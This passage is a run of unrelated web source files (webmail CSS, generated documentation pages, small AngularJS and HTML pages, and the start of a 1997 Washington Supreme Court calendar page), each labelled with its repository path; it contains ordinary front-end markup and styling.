background: -ms-linear-gradient(top, #00aad6 0%, #008fc9 100%);
background: linear-gradient(top, #00aad6 0%, #008fc9 100%);
}
ul.toolbarmenu.iconized li a,
ul.toolbarmenu.selectable li a {
padding-left: 30px;
}
ul.toolbarmenu.selectable li a.selected {
background: url(images/messages.png) 4px -27px no-repeat;
}
ul.toolbarmenu li label {
display: block;
color: #fff;
padding: 4px 8px;
text-shadow: 0px 1px 1px #333;
}
ul.toolbarmenu li a.icon {
color: #eee;
padding: 2px 6px;
}
ul.toolbarmenu li span.icon {
display: block;
min-height: 14px;
padding: 4px 4px 1px 24px;
height: 17px;
background-image: url(images/listicons.png);
background-position: -100px 0;
background-repeat: no-repeat;
opacity: 0.2;
filter: alpha(opacity=20);
}
ul.toolbarmenu li a.active span.icon {
opacity: 0.99;
filter: alpha(opacity=100);
}
ul.toolbarmenu li span.read {
background-position: 0 -1220px;
}
ul.toolbarmenu li span.unread {
background-position: 0 -1196px;
}
ul.toolbarmenu li span.flagged {
background-position: 0 -1244px;
}
ul.toolbarmenu li span.unflagged {
background-position: 0 -1268px;
}
ul.toolbarmenu li span.mail {
background-position: 0 -1293px;
}
ul.toolbarmenu li span.list {
background-position: 0 -1317px;
}
ul.toolbarmenu li span.invert {
background-position: 0 -1340px;
}
ul.toolbarmenu li span.cross {
background-position: 0 -1365px;
}
ul.toolbarmenu li span.print {
background-position: 0 -1436px;
}
ul.toolbarmenu li span.download {
background-position: 0 -1412px;
}
ul.toolbarmenu li span.edit {
background-position: 0 -1388px;
}
ul.toolbarmenu li span.viewsource {
background-position: 0 -1460px;
}
ul.toolbarmenu li span.extwin {
background-position: 0 -1484px;
}
ul.toolbarmenu li span.conversation {
background-position: 0 -1532px;
}
#rcmKSearchpane {
border-radius: 0 0 4px 4px;
border-top: 0;
}
#rcmKSearchpane ul li {
text-shadow: 0px 1px 1px #333;
text-decoration: none;
min-height: 14px;
padding: 6px 10px 6px 10px;
border: 0;
cursor: default;
}
.popupdialog {
display: none;
padding: 10px;
}
.popupdialog .formbuttons {
margin: 20px 0 4px 0;
}
.ui-dialog .prompt input {
display: block;
margin: 8px 0;
}
.hint {
margin: 4px 0;
color: #999;
text-shadow: 0px 1px 1px #fff;
}
.splitter {
user-select: none;
-moz-user-select: none;
-khtml-user-select: none;
position: absolute;
background: url(images/splitter.png) center no-repeat;
}
.splitter-h {
height: 10px;
width: 100%;
cursor: n-resize;
cursor: row-resize;
background-position: center 0;
}
.splitter-v {
width: 10px;
height: 100%;
cursor: e-resize;
cursor: col-resize;
background-position: 0 center;
}
#rcmdraglayer {
min-width: 260px;
width: auto !important;
width: 260px;
padding: 6px 8px;
background: #444;
border: 1px solid #555;
border-radius: 4px;
box-shadow: 0 2px 6px 0 #333;
-moz-box-shadow: 0 2px 6px 0 #333;
-webkit-box-shadow: 0 2px 6px 0 #333;
-o-box-shadow: 0 2px 6px 0 #333;
z-index: 250;
color: #ccc;
white-space: nowrap;
opacity: 0.92;
filter: alpha(opacity=92);
text-shadow: 0px 1px 1px #333;
}
#rcmdraglayer:after {
content: "";
position: absolute;
top: 6px;
left: -6px;
border-style: solid;
border-width: 6px 6px 6px 0;
border-color: transparent #444;
/* reduce the damage in FF3.0 */
display: block;
width: 0;
z-index: 251;
}
.draglayercopy:before {
position: absolute;
bottom: -6px;
left: -6px;
content: " ";
width: 16px;
height: 16px;
background: url(images/buttons.png) -7px -358px no-repeat;
z-index: 255;
}
/*** attachment list ***/
.attachmentslist {
list-style: none;
margin: 0;
padding: 0;
overflow: hidden;
text-overflow: ellipsis;
}
.attachmentslist li {
display: block;
position: relative;
background: url(images/filetypes.png) 0 0 no-repeat;
margin-bottom: 1px;
}
.attachmentslist li.pdf {
background-position: 0 -26px;
}
.attachmentslist li.doc,
.attachmentslist li.docx,
.attachmentslist li.msword {
background-position: 0 -52px;
}
.attachmentslist li.odt {
background-position: 0 -78px;
}
.attachmentslist li.xls,
.attachmentslist li.xlsx,
.attachmentslist li.msexcel {
background-position: 0 -104px;
}
.attachmentslist li.ods {
background-position: 0 -130px;
}
.attachmentslist li.zip,
.attachmentslist li.gz {
background-position: 0 -156px;
}
.attachmentslist li.rar {
background-position: 0 -182px;
}
.attachmentslist li.image {
background-position: 0 -208px;
}
.attachmentslist li.jpg,
.attachmentslist li.jpeg {
background-position: 0 -234px;
}
.attachmentslist li.png {
background-position: 0 -260px;
}
.attachmentslist li.m4p {
background-position: 0 -286px;
}
.attachmentslist li.mp3,
.attachmentslist li.audio {
background-position: 0 -312px;
}
.attachmentslist li.video {
background-position: 0 -338px;
}
.attachmentslist li.txt,
.attachmentslist li.text {
background-position: 0 -416px;
}
.attachmentslist li.ics,
.attachmentslist li.calendar {
background-position: 0 -364px;
}
.attachmentslist li.vcard {
background-position: 0 -390px;
}
.attachmentslist li.sig,
.attachmentslist li.pgp-signature,
.attachmentslist li.pkcs7-signature {
background-position: 0 -442px;
}
.attachmentslist li.html {
background-position: 0 -468px;
}
.attachmentslist li.eml,
.attachmentslist li.rfc822 {
background-position: 0 -494px;
}
.attachmentslist li a,
#compose-attachments ul li {
display: block;
color: #333;
font-weight: bold;
padding: 8px 4px 3px 30px;
text-shadow: 0px 1px 1px #fff;
text-decoration: none;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
#compose-attachments ul li {
padding-right: 28px;
}
.attachmentslist li a:hover {
text-decoration: underline;
}
.attachmentslist li.uploading {
background: url(images/ajaxloader.gif) 2px 6px no-repeat;
}
.attachmentslist li a.delete,
.attachmentslist li a.cancelupload {
position: absolute;
top: 6px;
right: 0;
width: 24px;
height: 18px;
padding: 0;
text-decoration: none;
text-indent: -5000px;
background: url(images/buttons.png) -7px -337px no-repeat;
}
.attachmentslist li a.cancelupload {
background-position: -7px -377px;
}
/*** fieldset tabs ***/
.tabsbar {
margin-bottom: 12px;
padding-top: 15px;
height: 27px;
white-space: nowrap;
}
.ui-dialog-content .tabsbar {
margin-bottom: 0;
}
.tabsbar .tablink {
padding: 15px 1px 15px 0;
background: #f8f8f8;
background: -moz-linear-gradient(top, #f8f8f8 0%, #d3d3d3 50%, #f8f8f8 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f8f8f8), color-stop(50%,#d3d3d3), color-stop(100%,#f8f8f8));
background: -webkit-linear-gradient(top, #f8f8f8 0%, #d3d3d3 50%, #f8f8f8 100%);
background: -o-linear-gradient(top, #f8f8f8 0%, #d3d3d3 50%, #f8f8f8 100%);
background: -ms-linear-gradient(top, #f8f8f8 0%, #d3d3d3 50%, #f8f8f8 100%);
background: linear-gradient(top, #f8f8f8 0%, #d3d3d3 50%, #f8f8f8 100%);
}
.tabsbar .tablink:last-child {
background: none;
}
.tabsbar .tablink:last-child a {
border-right: 0;
}
.tabsbar .tablink a {
padding: 15px;
color: #999;
font-size: 12px;
font-weight: bold;
text-decoration: none;
background: #fff;
border-right: 1px solid #fafafa;
}
.tabsbar .tablink.selected a {
color: #004458;
background: #f6f6f6;
background: -moz-linear-gradient(top, #fff 40%, #efefef 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(40%,#fff), color-stop(100%,#efefef));
background: -o-linear-gradient(top, #fff 40%, #efefef 100%);
background: -ms-linear-gradient(top, #fff 40%, #efefef 100%);
background: linear-gradient(top, #fff 40%, #efefef 100%);
}
fieldset.tab {
border: 0;
padding: 0;
margin-left: 0;
}
|
client/components/ow-footer/ow-footer.html | owlabs/CHHS-POC | <footer class="footer">
<div class="container-fluid">
<p>California Health and Human Services |
<a target="_blank" href="http://labs.oliverwyman.com/index.html">Oliver Wyman Labs</a> |
Questions? <a href="mailto:Edmund.Olson-Morgan@oliverwyman.com">Ed Olson-Morgan</a></p>
</div>
</footer> |
apps/modeller9v8/doc/node303.html | bjornwallner/proq2-server | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<!--Converted with LaTeX2HTML 2008 (1.71)
original version by: Nikos Drakos, CBLU, University of Leeds
* revised and updated by: Marcus Hennecke, Ross Moore, Herb Swan
* with significant contributions from:
Jens Lippmann, Marek Rouchal, Martin Wilck and others -->
<HTML>
<HEAD>
<TITLE>Sequence.name -- protein name</TITLE>
<META NAME="description" CONTENT="Sequence.name -- protein name">
<META NAME="keywords" CONTENT="manual">
<META NAME="resource-type" CONTENT="document">
<META NAME="distribution" CONTENT="global">
<META NAME="Generator" CONTENT="LaTeX2HTML v2008">
<META HTTP-EQUIV="Content-Style-Type" CONTENT="text/css">
<LINK REL="STYLESHEET" HREF="manual.css">
<LINK REL="next" HREF="node304.html">
<LINK REL="previous" HREF="node302.html">
<LINK REL="up" HREF="node298.html">
<LINK REL="next" HREF="node304.html">
</HEAD>
<BODY >
<!--Navigation Panel-->
<A NAME="tex2html6190"
HREF="node304.html">
<IMG WIDTH="37" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="next" SRC="next.png"></A>
<A NAME="tex2html6184"
HREF="node298.html">
<IMG WIDTH="26" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="up" SRC="up.png"></A>
<A NAME="tex2html6178"
HREF="node302.html">
<IMG WIDTH="63" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="previous" SRC="prev.png"></A>
<A NAME="tex2html6186"
HREF="node1.html">
<IMG WIDTH="65" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="contents" SRC="contents.png"></A>
<A NAME="tex2html6188"
HREF="node470.html">
<IMG WIDTH="43" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="index" SRC="index.png"></A>
<BR>
<B> Next:</B> <A NAME="tex2html6191"
HREF="node304.html">Sequence.prottyp protein</A>
<B> Up:</B> <A NAME="tex2html6185"
HREF="node298.html">The Sequence class: a</A>
<B> Previous:</B> <A NAME="tex2html6179"
HREF="node302.html">Sequence.source source</A>
<B> <A NAME="tex2html6187"
HREF="node1.html">Contents</A></B>
<B> <A NAME="tex2html6189"
HREF="node470.html">Index</A></B>
<BR>
<BR>
<!--End of Navigation Panel-->
<H2><A NAME="SECTION0011165000000000000000">
Sequence.name -- protein name</A>
</H2> <A NAME="30636"></A><A NAME="MEMB:Sequence.name"></A><BLOCKQUOTE>
This gives the full name of the protein, if available.
</BLOCKQUOTE>
<P>
<BR><HR>
<ADDRESS>
Automatic builds
2010-04-21
</ADDRESS>
</BODY>
</HTML>
|
s2tbx-s2msi-idepix-ui/src/main/resources/org/esa/s2tbx/s2msi/idepix/docs/idepix/IdepixProcessorDescription.html | oscarpicas/s2tbx | <!--
~ Copyright (C) 2010 Brockmann Consult GmbH (info@brockmann-consult.de)
~
~ This program is free software; you can redistribute it and/or modify it
~ under the terms of the GNU General Public License as published by the Free
~ Software Foundation; either version 3 of the License, or (at your option)
~ any later version.
~ This program is distributed in the hope that it will be useful, but WITHOUT
~ ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
~ FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
~ more details.
~
~ You should have received a copy of the GNU General Public License along
~ with this program; if not, see http://www.gnu.org/licenses/
-->
<html>
<head>
<title>SNAP Data Processors - Idepix Processor - Processor Descriptions</title>
<link rel="stylesheet" href="../style.css">
</head>
<body>
<table class="header">
<tr class="header">
<td class="header">
SNAP Data Processors - Idepix Processor - Processor Descriptions
</td>
<td class="header" align="right"><a href="nbdocs://org.esa.snap.snap.help/org/esa/snap/snap/help/docs/general/overview/SnapOverview.html"><img src="../images/snap_header.jpg"
border=0></a>
</td>
</tr>
</table>
<h3>Processor Descriptions</h3>
<p> The following sections describe in detail the processor user interfaces and parameters for the supported instruments.</p>
<p><a href="Sentinel2ProcessorDescription.html">MODIS</a></p>
<hr>
</body>
</html> |
glue-webapp/src/main/webapp/stream/create.html | pgillet/Glue | <html>
<head>
<title/>
</head>
<body ng-app="glue">
<div style="padding-bottom:20px">
<h3>Add an event</h3>
</div>
<form ng-submit="createEvent()">
<div>
<label>First Name</label>
<div>
<input name="title" ng-model="title" type="text"/>
</div>
</div>
<div>
<div style="padding-left:200px">
<input type="submit" value="Créer"/>
</div>
</div>
</form>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.7/angular.min.js" type="text/javascript"/>
<script src="https://code.angularjs.org/1.4.7/angular-resource.min.js" type="text/javascript"/>
<script type="text/javascript">
var app = angular.module('glue',['ngResource']);
app.factory('eventFactory', ['$resource', function($resource) {
return $resource('/services/events/:id', null,
{
'update': { method:'PUT' }
});
}]);
app.controller('eventController', ['$scope', 'eventFactory', function ($scope, eventFactory) {
$scope.status;
$scope.events;
getEvents();
$scope.insertEvent = function () {
//Fake eventomer data
var event = {
"title": "ceci est un test",
"category": "MUSIC",
"venue": {
"id": "1",
"name": "LE BIKINI",
"description": null,
"type": null,
"address": "rue Theodore Monod RAMONVILLE SAINT-AGNE",
"city": "Toulouse",
"region": null,
"regionAbbreviation": null,
"postalCode": null,
"country": "France",
"countryTwoLetterAbbreviation": null,
"countryThreeLetterAbbreviation": null,
"latitude": 0,
"longitude": 0,
"url": null,
"geocodeType": null,
"source": null,
"parent": null,
"children": null,
"events": null,
"links": null,
"comments": null,
"images": null,
"properties": null,
"tags": null,
"created": 1425246157000,
"timeZone": null,
"reference": false
}
};
eventFactory.save(event);
};
}]);
</script>
</body>
</html> |
browser2/src/index.html | calaldees/KaraKara | <!DOCTYPE html>
<html lang="en">
<head>
<title>KaraKara</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, viewport-fit=cover">
<link rel="icon" type="image/svg+xml" href="static/favicon.svg">
<link href="static/style.scss" rel="stylesheet" type="text/css" />
</head>
<body><noscript>This page requires JavaScript</noscript></body>
<script type="module" src="browser.tsx"></script>
</html>
|
www/testlib.css | Koala-Kaolin/pyweb |
body {
background-color: black;
color: white;
}
input[type="file"],
input[type="number"],
input[type="text"]
{
color: black;
background-color: gray;
}
input:invalid {
background-color: #f88;
}
input:valid {
background-color: #8f8;
}
textarea {
display: block;
flex-grow: 1;
color: white;
background-color: #55a;
margin-left: 3em;
}
.url {
color: red !important;
}
input.url {
background: none;
background-color: #333333;
border: none;
}
.param {
margin-top: 1em;
}
.test {
padding-bottom: 2em;
display: none;
padding-left: 10em;
padding-right: 10em;
}
.formMethod {
width: 4em;
}
.method {
color: yellow;
text-decoration: underline;
width: 100%;
}
.command {
}
.url {
color: cyan;
}
form {
padding-top: 1em;
padding-bottom: 2em;
position: block;
}
|
jdk8en_us/docs/api/javax/xml/bind/annotation/adapters/package-tree.html | DeanAaron/jdk8 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_11) on Mon Jun 16 17:36:01 PDT 2014 -->
<title>javax.xml.bind.annotation.adapters Class Hierarchy (Java Platform SE 8 )</title>
<meta name="date" content="2014-06-16">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="javax.xml.bind.annotation.adapters Class Hierarchy (Java Platform SE 8 )";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><strong>Java™ Platform<br>Standard Ed. 8</strong></div>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../javax/xml/bind/annotation/package-tree.html">Prev</a></li>
<li><a href="../../../../../javax/xml/bind/attachment/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?javax/xml/bind/annotation/adapters/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">Hierarchy For Package javax.xml.bind.annotation.adapters</h1>
<span class="packageHierarchyLabel">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="../../../../../overview-tree.html">All Packages</a></li>
</ul>
</div>
<div class="contentContainer">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li type="circle">java.lang.<a href="../../../../../java/lang/Object.html" title="class in java.lang"><span class="typeNameLink">Object</span></a>
<ul>
<li type="circle">javax.xml.bind.annotation.adapters.<a href="../../../../../javax/xml/bind/annotation/adapters/XmlAdapter.html" title="class in javax.xml.bind.annotation.adapters"><span class="typeNameLink">XmlAdapter</span></a><ValueType,BoundType>
<ul>
<li type="circle">javax.xml.bind.annotation.adapters.<a href="../../../../../javax/xml/bind/annotation/adapters/CollapsedStringAdapter.html" title="class in javax.xml.bind.annotation.adapters"><span class="typeNameLink">CollapsedStringAdapter</span></a></li>
<li type="circle">javax.xml.bind.annotation.adapters.<a href="../../../../../javax/xml/bind/annotation/adapters/HexBinaryAdapter.html" title="class in javax.xml.bind.annotation.adapters"><span class="typeNameLink">HexBinaryAdapter</span></a></li>
<li type="circle">javax.xml.bind.annotation.adapters.<a href="../../../../../javax/xml/bind/annotation/adapters/NormalizedStringAdapter.html" title="class in javax.xml.bind.annotation.adapters"><span class="typeNameLink">NormalizedStringAdapter</span></a></li>
</ul>
</li>
<li type="circle">javax.xml.bind.annotation.adapters.<a href="../../../../../javax/xml/bind/annotation/adapters/XmlJavaTypeAdapter.DEFAULT.html" title="class in javax.xml.bind.annotation.adapters"><span class="typeNameLink">XmlJavaTypeAdapter.DEFAULT</span></a></li>
</ul>
</li>
</ul>
<h2 title="Annotation Type Hierarchy">Annotation Type Hierarchy</h2>
<ul>
<li type="circle">javax.xml.bind.annotation.adapters.<a href="../../../../../javax/xml/bind/annotation/adapters/XmlJavaTypeAdapter.html" title="annotation in javax.xml.bind.annotation.adapters"><span class="typeNameLink">XmlJavaTypeAdapter</span></a> (implements java.lang.annotation.<a href="../../../../../java/lang/annotation/Annotation.html" title="interface in java.lang.annotation">Annotation</a>)</li>
<li type="circle">javax.xml.bind.annotation.adapters.<a href="../../../../../javax/xml/bind/annotation/adapters/XmlJavaTypeAdapters.html" title="annotation in javax.xml.bind.annotation.adapters"><span class="typeNameLink">XmlJavaTypeAdapters</span></a> (implements java.lang.annotation.<a href="../../../../../java/lang/annotation/Annotation.html" title="interface in java.lang.annotation">Annotation</a>)</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><strong>Java™ Platform<br>Standard Ed. 8</strong></div>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../javax/xml/bind/annotation/package-tree.html">Prev</a></li>
<li><a href="../../../../../javax/xml/bind/attachment/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?javax/xml/bind/annotation/adapters/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small><font size="-1"> <a href="http://bugreport.sun.com/bugreport/">Submit a bug or feature</a> <br>For further API reference and developer documentation, see <a href="http://download.oracle.com/javase/8/docs/index.html" target="_blank">Java SE Documentation</a>. That documentation contains more detailed, developer-targeted descriptions, with conceptual overviews, definitions of terms, workarounds, and working code examples.<br> Copyright © 1993, 2014, Oracle and/or its affiliates. All rights reserved. </font></small></p>
</body>
</html>
|
burstcoin-1.3.6/html/ui/doc/nxt/class-use/EconomicClustering.html | dawallet/burstwindowswallet | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_131) on Sat Oct 28 21:24:43 CEST 2017 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class nxt.EconomicClustering (burstcoin 1.3.6cg API)</title>
<meta name="date" content="2017-10-28">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class nxt.EconomicClustering (burstcoin 1.3.6cg API)";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../nxt/EconomicClustering.html" title="class in nxt">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-all.html">Index</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?nxt/class-use/EconomicClustering.html" target="_top">Frames</a></li>
<li><a href="EconomicClustering.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class nxt.EconomicClustering" class="title">Uses of Class<br>nxt.EconomicClustering</h2>
</div>
<div class="classUseContainer">No usage of nxt.EconomicClustering</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../nxt/EconomicClustering.html" title="class in nxt">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-all.html">Index</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?nxt/class-use/EconomicClustering.html" target="_top">Frames</a></li>
<li><a href="EconomicClustering.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>Copyright © 2017. All rights reserved.</small></p>
</body>
</html>
|
sources/wasc/1997/05/21-docket.html | jeffpar/courtcasts | <!DOCTYPE html>
<html>
<head>
<title>Washington State Courts - Supreme Court Calendar </title>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<link rel="icon" type="image/vnd.microsoft.icon" href="//www.courts.wa.gov/favicon.ico">
<noscript>
<link href="/css/layoutStylesv3.css" type=text/css rel=stylesheet />
<link href="/css/stylesheetv2.css" type=text/css rel=stylesheet />
<link href="/css/tabStyles.css" type=text/css rel=stylesheet />
<link href="/css/subsite_stylesv2.css" rel=stylesheet type=text/css />
</noscript>
<script language="JavaScript" src="/includes/AOCScripts.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript1.2" src="/includes/stm31.js"></script>
<script src="/scripts/jquery-1.11.2.min.js" type="text/javascript" language="JavaScript"></script>
<script src="/js/modernizr-custom.min.js"></script>
<script src="/js/featureDetection.js"></script>
<script src="/js/jqueryForForm.js" type="text/javascript"></script>
<script src="/js/multiFileUpload.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="/css/libraryStylesv2.css" />
<link rel="stylesheet" type="text/css" href="/css/layoutStylesv3.css" />
<link rel="stylesheet" type="text/css" href="/css/stylesheetv2.css" />
<link rel="stylesheet" type="text/css" href="/css/subsite_stylesv2.css" />
</head>
<body>
<div id="topLayout">
<div id="newLayout">
<div id="newPageLayout">
<a name="top"></a>
<div id="topheader">
<div id="left"><a href="/"><img src="/images/waCourtsLogo.png" border="0" alt="Welcome to Washington State Courts" /></a></div>
<div id="right">
<div class="socialMediaBar">
<ul>
<li><a href="/notifications/" title="Sign up for Notifications"><img src="/images/iconEmailBlue.png" alt="Sign up for Email Notifications" border="0" /></a></li>
<li><a href="/notifications/" title="Sign up for Notifications">Get Email Updates</a></li>
<li>|</li>
<li><a href="https://aoc.custhelp.com/"><img src="/images/iconHelp_flatBlueSm2.png" border="0" /></a></li>
<li><a href="https://aoc.custhelp.com/">FAQs & eService Center</a></li>
</ul>
</div>
<div class="topSearchArea">
<form method="post" action="/search/index.cfm?fa=search.start_search">
<input type="text" name="searchTerms" size="36" maxlength="256" placeholder="Search WA Courts Site" class="searchField" value="Search WA Courts Site"
onfocus="if (this.value=='Search WA Courts Site'){this.value='';$(this).css('color','#000000','font-style','normal');}"
onblur="if (this.value==''){this.value='Search WA Courts Site';$(this).css('color', '#bbbbb7');}">
<input type="image" name="btnSearch" class="searchButton" alt="Search" src="/images/iconSearch.png">
</form>
</div>
</div>
</div>
<div id="mainNav">
<ul id="menuBar">
<a href="/forms/" ><li class="menuItem first" >Forms</li></a>
<a href="/court_dir/" ><li class="menuItem" >Court Directory</li></a>
<a href="/opinions/" ><li class="menuItem">Opinions</li></a>
<a href="/court_rules/" ><li class="menuItem">Rules</li></a>
<a href="/appellate_trial_courts/" ><li class="menuItem">Courts</li></a>
<a href="/programs_orgs/" ><li class="menuItem">Programs & Organizations</li></a>
<a href="/newsinfo/index.cfm?fa=newsinfo.displayContent&theFile=content/ResourcesPubsReports" ><li class="menuItem last">Resources</li></a>
</ul>
</div>
<div id="topline">
<div id="left" class="breadcrumb"><a href="/">Courts Home</a> > <a href="/appellate_trial_courts/" class="breadcrumb">Courts</a> > <a href="/appellate_trial_courts/supreme/calendar" class="breadcrumb">Supreme Court Calendar</a></div>
</div>
<a name="body"></a>
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="clear:both;">
<tr>
<td width="10"> </td>
<td valign="top" class="mainPage">
<table width="100%">
<tr>
<td valign="top"><h2>Supreme Court Calendar</h2></td>
<td valign="top" align="right" width="175"><div class="linkBox"><a href="/appellate_trial_courts/coaBriefs/index.cfm?fa=coaBriefs.ScHome&courtId=A08">Supreme Court Briefs</a></div></td>
</tr>
</table>
<HTML>
<HEAD>
<TITLE>Washington State Courts - Supreme Court Calendar - May 21, 1997</TITLE>
</HEAD>
<BODY>
<h2><B>May 21, 1997</B></h2>
<P>
<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 WIDTH=100%>
<tr>
<td width=33%><b>9:00 A.M.</b></td>
<td width=30% align="center"><b>Olympia</b></td>
<td width=36% align="right"><b>Wednesday, May 21, 1997</b></td>
</tr>
</TABLE>
<BR>
